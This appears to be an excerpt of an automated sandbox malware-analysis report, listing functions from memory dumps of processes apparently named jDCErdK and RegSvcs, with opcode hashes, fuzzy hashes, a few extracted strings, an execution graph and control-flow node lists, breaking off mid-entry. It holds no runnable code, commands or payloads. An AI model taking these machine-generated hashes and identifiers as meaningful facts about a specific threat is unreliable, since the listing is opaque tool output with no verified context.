                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779166338.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_104d000_jDCErdK.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 639c1757d3613f2fa6e0144541520da4e5d2a7137929a46c6beda987c6d1701c
                                              • Instruction ID: 103ff5ac53d051d23971160f3018b7df7ffb382e73dc49d39f19f74b64964db6
                                              • Opcode Fuzzy Hash: 639c1757d3613f2fa6e0144541520da4e5d2a7137929a46c6beda987c6d1701c
                                              • Instruction Fuzzy Hash: 952122B1604200DFCB15DF98D9C4B2ABFA5EB94314F20C5BDE98A4B256C33AD447CB61
                                              Function 0104D006 Relevance: .1, Instructions: 63COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779166338.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_104d000_jDCErdK.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1d6a77f5825052a1563486c88cd7e16a29689ea930333889f0415dbb28d320bc
                                              • Instruction ID: 277b8822aa24c626f9b7bd2a92ee3aded357927e7239c5be18b6242e2db02109
                                              • Opcode Fuzzy Hash: 1d6a77f5825052a1563486c88cd7e16a29689ea930333889f0415dbb28d320bc
                                              • Instruction Fuzzy Hash: 062195B55083809FCB03CF54D9D4711BFB1EB56214F24C5EAD8898F2A7C33A9806CB62
                                              Function 0103D687 Relevance: .1, Instructions: 58COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779025770.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_103d000_jDCErdK.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                              • Instruction ID: ebed4ad979de76a6db662f967183622f38af0b434fa98b92a65cb3ac15291ec8
                                              • Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                              • Instruction Fuzzy Hash: 4A219D76504280DFDB07CF54D9C4B16BFB2FB88314F24C6A9D9490B256D33AD426DB91
                                              Function 0103D3D3 Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779025770.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_103d000_jDCErdK.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                              • Instruction ID: 8bbf5e04af65d382927f0d222efa85a89b4f23173b2eda0c65918aa14c9d2717
                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                              • Instruction Fuzzy Hash: 83110372404240CFDB02CF54D5C4B56BFB1FB94324F24C2A9D9490B257C33AE45ACBA1
                                              Function 0104D1CF Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779166338.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_104d000_jDCErdK.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                              • Instruction ID: 4164bd15fcb9eee1ddce46ab03148a32035fb5fd5c5ccad4b28e9c69ac413efe
                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                              • Instruction Fuzzy Hash: 3911BBB5504280DFDB02DF54C6C4B15BFA1FB94224F24C6AAD8894B296C33AD40ACB61
                                              Function 0103D7C5 Relevance: .0, Instructions: 45COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779025770.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_103d000_jDCErdK.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 358ef5a2393db4eb3017fa03f1a50b9186ae4906ae95a60fb32405b253090a55
                                              • Instruction ID: 21466dad7aa7472f02047fb033583ced6ef4877d91c43bbc545704a65cd939a0
                                              • Opcode Fuzzy Hash: 358ef5a2393db4eb3017fa03f1a50b9186ae4906ae95a60fb32405b253090a55
                                              • Instruction Fuzzy Hash: EA012B31409340DAE7118B69CD84767FFECEF81324F58C8AAED4C1A286D279E841C7B1
                                              Function 0103D7C4 Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1779025770.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_103d000_jDCErdK.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d1d5c7e480f36c86bd30c9b63817b84484acd603ae64f6c1dc5ea2b85fb06cbb
                                              • Instruction ID: b776517fdc8152eb4ff8a9314c94d315a6c82d834239187fa51d730ffa5937f2
                                              • Opcode Fuzzy Hash: d1d5c7e480f36c86bd30c9b63817b84484acd603ae64f6c1dc5ea2b85fb06cbb
                                              • Instruction Fuzzy Hash: DCF06271405344AAE7118F1AD984B62FFECEF81724F18C89AED4C5A286C279A845CBB1

                                              Execution Graph

                                              Execution Coverage:13.8%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:26
                                              Total number of Limit Nodes:5
                                              execution_graph 26453 dc0848 26455 dc084e 26453->26455 26454 dc091b 26455->26454 26458 dc148e 26455->26458 26464 dc1382 26455->26464 26460 dc1396 26458->26460 26461 dc1493 26458->26461 26459 dc1484 26459->26455 26460->26459 26463 dc148e GlobalMemoryStatusEx 26460->26463 26469 dc7ea8 26460->26469 26461->26455 26463->26460 26466 dc1396 26464->26466 26465 dc1484 26465->26455 26466->26465 26467 dc7ea8 GlobalMemoryStatusEx 26466->26467 26468 dc148e GlobalMemoryStatusEx 26466->26468 26467->26466 26468->26466 26470 dc7eb2 26469->26470 26471 dc7ecc 26470->26471 26474 614d9f0 26470->26474 26479 614d9e0 26470->26479 26471->26460 26476 614da05 26474->26476 26475 614dc1a 26475->26471 26476->26475 26477 614dc31 GlobalMemoryStatusEx 26476->26477 26478 614de88 GlobalMemoryStatusEx 26476->26478 26477->26476 26478->26476 26480 614d9f0 26479->26480 26481 614dc1a 26480->26481 26482 614dc31 GlobalMemoryStatusEx 26480->26482 26483 614de88 GlobalMemoryStatusEx 26480->26483 26481->26471 26482->26480 26483->26480

                                              Executed Functions

                                              Function 00DCA968 Relevance: 2.8, Instructions: 2804COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 45eed6ac58b00d1ccb10af4b9a8d9d4d765f539647f8c1b1c2ccfbffc4074049
                                              • Instruction ID: b903f8db62d9f47246b29b6cc4620c58add7878a3e1f48abc01aaa663f754ac1
                                              • Opcode Fuzzy Hash: 45eed6ac58b00d1ccb10af4b9a8d9d4d765f539647f8c1b1c2ccfbffc4074049
                                              • Instruction Fuzzy Hash: 9653F731C10B1A8ACB55EF68C880699F7B1FF99300F55D79AE4587B125EF70AAC4CB81
                                              Function 00DC3E80 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \Vj
                                              • API String ID: 0-3020623371
                                              • Opcode ID: 8c29249dfc49d5f755bb93cf53df8c4e2f007aada37561789cd648dccfe11ce2
                                              • Instruction ID: da312d451ecf21ad083908f8990c4c953d7c1234392be3aed025d2331416cefd
                                              • Opcode Fuzzy Hash: 8c29249dfc49d5f755bb93cf53df8c4e2f007aada37561789cd648dccfe11ce2
                                              • Instruction Fuzzy Hash: 9B915C70E0020ACFDF14CFA9C991B9EBBF2AF48314F18852DE455A7254EB749985CBA1
                                              Function 00DC4A98 Relevance: .3, Instructions: 266COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e87e09f6e5a4b029d6335d25164538b97768eb7b50dc5e367c316535dbeeb2a7
                                              • Instruction ID: 936aac8e34b32f3074ece46d853c9907f7bee414f0cf800c2d85cce4634c8225
                                              • Opcode Fuzzy Hash: e87e09f6e5a4b029d6335d25164538b97768eb7b50dc5e367c316535dbeeb2a7
                                              • Instruction Fuzzy Hash: 31B13F70E0020ACFDB14DFA9C995B9DBBF2AF88314F18852DD815EB254EB74D845CB91
                                              Function 00DC4804 Relevance: 2.7, Strings: 2, Instructions: 183COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2065 dc4804-dc489c 2069 dc489e-dc48a9 2065->2069 2070 dc48e6-dc48e8 2065->2070 2069->2070 2072 dc48ab-dc48b7 2069->2072 2071 dc48ea-dc4902 2070->2071 2079 dc494c-dc494e 2071->2079 2080 dc4904-dc490f 2071->2080 2073 dc48b9-dc48c3 2072->2073 2074 dc48da-dc48e4 2072->2074 2075 dc48c5 2073->2075 2076 dc48c7-dc48d6 2073->2076 2074->2071 2075->2076 2076->2076 2078 dc48d8 2076->2078 2078->2074 2081 dc4950-dc4962 2079->2081 2080->2079 2082 dc4911-dc491d 2080->2082 2089 dc4969-dc4995 2081->2089 2083 dc491f-dc4929 2082->2083 2084 dc4940-dc494a 2082->2084 2086 dc492d-dc493c 2083->2086 2087 dc492b 2083->2087 2084->2081 2086->2086 2088 dc493e 2086->2088 2087->2086 2088->2084 2090 dc499b-dc49a9 2089->2090 2091 dc49ab-dc49b1 2090->2091 2092 dc49b2-dc4a0f 2090->2092 2091->2092 2099 dc4a1f-dc4a23 2092->2099 2100 dc4a11-dc4a15 2092->2100 2102 dc4a25-dc4a29 2099->2102 2103 dc4a33-dc4a37 2099->2103 2100->2099 2101 dc4a17-dc4a1a call dc0ab8 2100->2101 2101->2099 2102->2103 2105 dc4a2b-dc4a2e call dc0ab8 2102->2105 2106 dc4a39-dc4a3d 2103->2106 2107 dc4a47-dc4a4b 2103->2107 2105->2103 2106->2107 2111 dc4a3f 2106->2111 2108 dc4a4d-dc4a51 2107->2108 2109 dc4a5b 2107->2109 2108->2109 2112 dc4a53 2108->2112 2113 dc4a5c 2109->2113 2111->2107 2112->2109 2113->2113
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \Vj$\Vj
                                              • API String ID: 0-2095017393
                                              • Opcode ID: c7181bb2f1646f054af906fb11b0001ed83a9ddd30940d6667debf8c7d37c293
                                              • Instruction ID: 34491c0781fda876bec9f76920c2994b54790617ba3c36dc275cc4d9db9ac142
                                              • Opcode Fuzzy Hash: c7181bb2f1646f054af906fb11b0001ed83a9ddd30940d6667debf8c7d37c293
                                              • Instruction Fuzzy Hash: A7716AB0E0025ACFDB10CFA9C991B9EBBF1AF48314F14812DE415EB254EB749846CFA5
                                              Function 00DC4810 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2114 dc4810-dc489c 2117 dc489e-dc48a9 2114->2117 2118 dc48e6-dc48e8 2114->2118 2117->2118 2120 dc48ab-dc48b7 2117->2120 2119 dc48ea-dc4902 2118->2119 2127 dc494c-dc494e 2119->2127 2128 dc4904-dc490f 2119->2128 2121 dc48b9-dc48c3 2120->2121 2122 dc48da-dc48e4 2120->2122 2123 dc48c5 2121->2123 2124 dc48c7-dc48d6 2121->2124 2122->2119 2123->2124 2124->2124 2126 dc48d8 2124->2126 2126->2122 2129 dc4950-dc4995 2127->2129 2128->2127 2130 dc4911-dc491d 2128->2130 2138 dc499b-dc49a9 2129->2138 2131 dc491f-dc4929 2130->2131 2132 dc4940-dc494a 2130->2132 2134 dc492d-dc493c 2131->2134 2135 dc492b 2131->2135 2132->2129 2134->2134 2136 dc493e 2134->2136 2135->2134 2136->2132 2139 dc49ab-dc49b1 2138->2139 2140 dc49b2-dc4a0f 2138->2140 2139->2140 2147 dc4a1f-dc4a23 2140->2147 2148 dc4a11-dc4a15 2140->2148 2150 dc4a25-dc4a29 2147->2150 2151 dc4a33-dc4a37 2147->2151 2148->2147 2149 dc4a17-dc4a1a call dc0ab8 2148->2149 2149->2147 2150->2151 2153 dc4a2b-dc4a2e call dc0ab8 2150->2153 2154 dc4a39-dc4a3d 2151->2154 2155 dc4a47-dc4a4b 2151->2155 2153->2151 2154->2155 2159 dc4a3f 2154->2159 2156 dc4a4d-dc4a51 2155->2156 2157 dc4a5b 2155->2157 2156->2157 2160 dc4a53 2156->2160 2161 dc4a5c 2157->2161 2159->2155 2160->2157 2161->2161
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \Vj$\Vj
                                              • API String ID: 0-2095017393
                                              • Opcode ID: 4fbd5ca5b5f6ff59a5d559878610bc70f717d12881c7c905935629ed162ceba8
                                              • Instruction ID: 2c7462ec4221595bce271d1c816fc0d0c6497c928a12d263729caa6ad10ac9b8
                                              • Opcode Fuzzy Hash: 4fbd5ca5b5f6ff59a5d559878610bc70f717d12881c7c905935629ed162ceba8
                                              • Instruction Fuzzy Hash: 64715C70E0025ACFDB14CFA9C991B9EBBF2AF48314F14812DE415EB254EB749845CFA5
                                              Function 0614E950 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2377 614e950-614e96b 2378 614e995-614e9b4 call 614e550 2377->2378 2379 614e96d-614e994 call 614d1d0 2377->2379 2385 614e9b6-614e9b9 2378->2385 2386 614e9ba-614ea19 2378->2386 2393 614ea1f-614eaac GlobalMemoryStatusEx 2386->2393 2394 614ea1b-614ea1e 2386->2394 2398 614eab5-614eadd 2393->2398 2399 614eaae-614eab4 2393->2399 2399->2398
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4116434515.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_6140000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 65f74cf4d0bf879ccd317de21cd8b90367f7ee4b276bae76b13a1cde88abbc52
                                              • Instruction ID: 69cc4c53e486d1e9eb1e51ac61476957be67849bf662befaa3e734660976b80f
                                              • Opcode Fuzzy Hash: 65f74cf4d0bf879ccd317de21cd8b90367f7ee4b276bae76b13a1cde88abbc52
                                              • Instruction Fuzzy Hash: 0E412472D003599FCB14DF69D8042DEBFF6BF89310F15856AE808EB251EB349885CBA1
                                              Function 0614EA38 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                              Download Yara Rule
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE ref: 0614EA9F
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4116434515.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_6140000_RegSvcs.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              • Opcode ID: fe52eb6b56a5cb77ce7bf120f81f6403558b45463db03e169fd3a81cd526d480
                                              • Instruction ID: 0072ca6480a13a48128ab3dd5603482ea480b8430a87727867279736486026eb
                                              • Opcode Fuzzy Hash: fe52eb6b56a5cb77ce7bf120f81f6403558b45463db03e169fd3a81cd526d480
                                              • Instruction Fuzzy Hash: 4F11E2B1C006599BCB10DF9AC544BDEFBF4BF48320F15816AD818B7250D378A944CFA5
                                              Function 00DC3E74 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \Vj
                                              • API String ID: 0-3020623371
                                              • Opcode ID: be1e139b56b502d0e62d8c2f1b958c694a522ed6743bd184b957d7551e848a4b
                                              • Instruction ID: 717a83690c093a85848968aa70f0d5b79f47788cfbd4ecac4465bde432f970f8
                                              • Opcode Fuzzy Hash: be1e139b56b502d0e62d8c2f1b958c694a522ed6743bd184b957d7551e848a4b
                                              • Instruction Fuzzy Hash: 59A14C70E0020ACFDF10CFA8C995BDDBBF1AF58314F18852DE455A7254EB749985CBA1
                                              Function 00DC6ECF Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRkq
                                              • API String ID: 0-1052062081
                                              • Opcode ID: d91535c9810bec3717f9c0e3b44490df1aa0cd83db50130a6d70a590a3add00b
                                              • Instruction ID: 608fbb1b7ff9a3f4a2be4135d09a7c3a728869c8913ca7e40cdc0448b9ec237f
                                              • Opcode Fuzzy Hash: d91535c9810bec3717f9c0e3b44490df1aa0cd83db50130a6d70a590a3add00b
                                              • Instruction Fuzzy Hash: D3613A347142158FCB04DB68D598BAE7BB6EF89700F2444ADE406DB3A2DB75DC41CBA1
                                              Function 00DC7D90 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRkq
                                              • API String ID: 0-1052062081
                                              • Opcode ID: 17fcf7a379398d2182204c27ce2a05f7123de34d118e37f5101f1ab97d786884
                                              • Instruction ID: 43847a1d01f48cfb3f2cc4b65541a1c3e79833c9e08ee010324bd27c94788d14
                                              • Opcode Fuzzy Hash: 17fcf7a379398d2182204c27ce2a05f7123de34d118e37f5101f1ab97d786884
                                              • Instruction Fuzzy Hash: E6316E31E1420ACBDB25DFA5D940BAEB7B6EF85310F248569F406EB240DB74AD41CB61
                                              Function 00DC7D80 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRkq
                                              • API String ID: 0-1052062081
                                              • Opcode ID: e67fe818791f1c41f2ef77d9830922362c801443a3a777ce6046800ddf5756c9
                                              • Instruction ID: f233623680f7583d37a1a6e3a3349124a749ab7684305cf305399e787750d304
                                              • Opcode Fuzzy Hash: e67fe818791f1c41f2ef77d9830922362c801443a3a777ce6046800ddf5756c9
                                              • Instruction Fuzzy Hash: C0316031E1421ADFDB25CF65C880B9EB7B6EF55300F248469F406EB250DB749C41CB61
                                              Function 00DC6B98 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRkq
                                              • API String ID: 0-1052062081
                                              • Opcode ID: e031dd3ec7baf07d8e875e763c7c3bd89e45fdaec3f2fb916b09f4fdee3bff86
                                              • Instruction ID: 5e08bf1d4c9994315d6775d65af2d32970d0ff4b53f43daf3175437cbd50338c
                                              • Opcode Fuzzy Hash: e031dd3ec7baf07d8e875e763c7c3bd89e45fdaec3f2fb916b09f4fdee3bff86
                                              • Instruction Fuzzy Hash: C1113A317082505FC712AB38845179E7FB6EFCB310B0584AFD055CB2A7DA359C45C3A5
                                              Function 00DC8720 Relevance: .6, Instructions: 558COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c827928d0005b67a0aaedb974764141527faef9cb719717d191cffdecdbe1de3
                                              • Instruction ID: bf3343affd4599349640feb02f0e4957620e3615364949a19114015904210136
                                              • Opcode Fuzzy Hash: c827928d0005b67a0aaedb974764141527faef9cb719717d191cffdecdbe1de3
                                              • Instruction Fuzzy Hash: F61250307012029FCB16A72CE994B2D77A2EB8A711B548D3DE006CB755CF35EC9ADB91
                                              Function 00DCA182 Relevance: .4, Instructions: 420COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 556029b44ef760207fcb1719a48f7efee301ba59a1ba1d251df1e0af805eb9aa
                                              • Instruction ID: d7d6e4de57b9eb4caf2872a62429b3c7dfc22ca9117acbaa13ace1b0007ad9c4
                                              • Opcode Fuzzy Hash: 556029b44ef760207fcb1719a48f7efee301ba59a1ba1d251df1e0af805eb9aa
                                              • Instruction Fuzzy Hash: A4F18334B002098FCF14DB68D584BAEBBB2EF89314F248469E50ADB355DB35EC41CB51
                                              Function 00DC4A8D Relevance: .3, Instructions: 265COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e093fe3408009e2aed9ed090e28124f3ceec4a33c963b037af1771c9cd0219c3
                                              • Instruction ID: de7abeee5aebb8c299ea08619fc563a1dc6d1ac3c8e1f0bc1c8689d29f26bf39
                                              • Opcode Fuzzy Hash: e093fe3408009e2aed9ed090e28124f3ceec4a33c963b037af1771c9cd0219c3
                                              • Instruction Fuzzy Hash: 3FB15070E0020ACFDB10DFA8C995BDDBBF2AF48314F18812DD819EB254EB749845CBA1
                                              Function 00DC6CD4 Relevance: .1, Instructions: 139COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a0e45565eec4a932d3703682a501a74846ef55d6c9f3a7cce42371e35fecdbb6
                                              • Instruction ID: e2fcf01f8c878168f72dd906c90521e35c86fb1b7564b4af293461c8629b273c
                                              • Opcode Fuzzy Hash: a0e45565eec4a932d3703682a501a74846ef55d6c9f3a7cce42371e35fecdbb6
                                              • Instruction Fuzzy Hash: CC511274E102198FDB14CFA9C885B9DBBF1BF48300F14812EE816AB355D774A845CBA5
                                              Function 00DCA6C8 Relevance: .1, Instructions: 137COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d40ef03519604a401de424c5db907c151b9ffd49808d870c3de4fd01980eaa4c
                                              • Instruction ID: 0948ad128b81cb82410d4fceabbaed1acc77585dd537f47c82ceb4a9113a3476
                                              • Opcode Fuzzy Hash: d40ef03519604a401de424c5db907c151b9ffd49808d870c3de4fd01980eaa4c
                                              • Instruction Fuzzy Hash: AE513B75A002099FDB04DFA9E984B99FBB5FF88310F14C169E9089B395E770D845CB90
                                              Function 00DC6CE0 Relevance: .1, Instructions: 132COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 51994c0dce54caf97827a0003c586a89e358959578c704da188ec47c0b164985
                                              • Instruction ID: 80c7761f0df28d2f50078e45a8d6d8430e5e371c66d0f42df0ddb3ce586aaa17
                                              • Opcode Fuzzy Hash: 51994c0dce54caf97827a0003c586a89e358959578c704da188ec47c0b164985
                                              • Instruction Fuzzy Hash: 195103B4E002198FDB14CFA9C884B9DBBF5BF48314F18812EE816AB355D774A844CFA5
                                              Function 00DC1128 Relevance: .1, Instructions: 119COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 24cbb50fbf843d20d9ce9be4d7d088ad292b701af51a7aeea20b8e40476175af
                                              • Instruction ID: 0ce3af544188e8a7bdf7f37e64c1be1417fe62baf42f6852f415ddec13a312bf
                                              • Opcode Fuzzy Hash: 24cbb50fbf843d20d9ce9be4d7d088ad292b701af51a7aeea20b8e40476175af
                                              • Instruction Fuzzy Hash: 9C51B6312532458FD706EB68FE80A597F71FB9A304304CA69E0054B73FDB28696BCB91
                                              Function 00DC1138 Relevance: .1, Instructions: 112COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.4107261750.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_dc0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 63a986d1438a14b50dea9dbd0b5bb8322b12ab38d5cf273d6a5d9355c92d48e1
